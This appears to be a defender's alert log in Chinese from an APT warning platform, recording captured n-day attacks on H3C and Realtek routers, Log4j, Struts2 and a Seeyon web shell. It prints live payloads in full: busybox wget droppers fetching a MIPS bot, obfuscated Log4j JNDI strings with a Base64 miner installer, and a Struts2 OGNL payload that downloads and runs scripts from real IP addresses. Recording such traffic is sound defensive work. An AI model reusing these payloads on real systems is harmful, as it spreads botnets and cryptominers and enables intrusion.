APT预警攻击平台截获Nday

2024年4月26日

设备漏洞【漏洞利用】H3C Magic R100任意代码执行漏洞(CVE-2022-34598)

0000 ：
0010 ：
0020 ：
0030 ：
0040 ：
0050 ：
0060 ：
0070 ：6F 72 66 3B 63 64 20 2F   74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73   65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78   20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E   32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D   70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F   74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70   73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;

设备漏洞【漏洞利用】Realtek SDK UPnP任意命令注入漏洞(CVE-2021-35394)

0000 ：
0010 ：
0020 ：
0030 ：
0040 ：
0050 ：
0060 ：
0070 ：6F 72 66 3B 63 64 20 2F   74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73   65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78   20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E   32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D   70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F   74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70   73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;

远程代码执行【WEB攻击】Apache Log4j2 任意代码执行漏洞(CVE-2021-44228)

请求内容

authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://colj0qcsjrgk9u7maq0gby3pkekxh7uyo.oast.pro}

外带信息

{"oob": {"domain": "146.59.16.84", "protocol": "tcp"}}

请求：

http://xxx.xxx.xxx.xxx:9092/t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')

请求头

Accept: application/json, text/plain, */*
X-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')
User-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-

命令注入【WEB攻击】Struts2-045远程命令执行漏洞(CVE-2017-5638)

外带信息

{"oob": {"domain": "87.121.105.232", "protocol": "tcp"},"relation": {"cmd": "curl"}}

请求头

Host: xxx.xx.xxx.xxxx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="(curl -s http://0x5778549c/i || wget -q -O - http://0x5778549c/i || lwp-download http://0x5778549c/i /dev/shm/i) | bash -sh; bash /dev/shm/i; rm -rf /dev/shm/i; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJw== | base64 -d | bash -").(#cmd1="powershell iex(New-Object Net.WebClient).DownloadString('http://87.121.105.232/bin.ps1')").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{"cmd.exe","/c",#cmd1}:{"/bin/bash","-c",#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Content-Length: 0

信息泄露【WEB攻击】检测到探测服务器config.json文件

这个竟然成功了，经排查，不过没啥影响

http://xxx.xx.xxx.xxx:xxxx/sxxyxxn/common/cap4/template/base/conditions/config.json

命令注入【WEB攻击】检测到系统命令注入攻击(ipconfig)

外带信息

{"relation": {"cmd": "ipconfig"}}

一句话木马

http://xxx.xxx.xxxx.xxxx:xxxx/seeyon/qweasdzxc.jsp?pwd=0&i=ipconfig

响应头

Content-Type: text/html
Content-Length: 537
Date: Sat, 27 Apr 2024 16:32:31 GMT
Connection: close
Server: SY8045

唉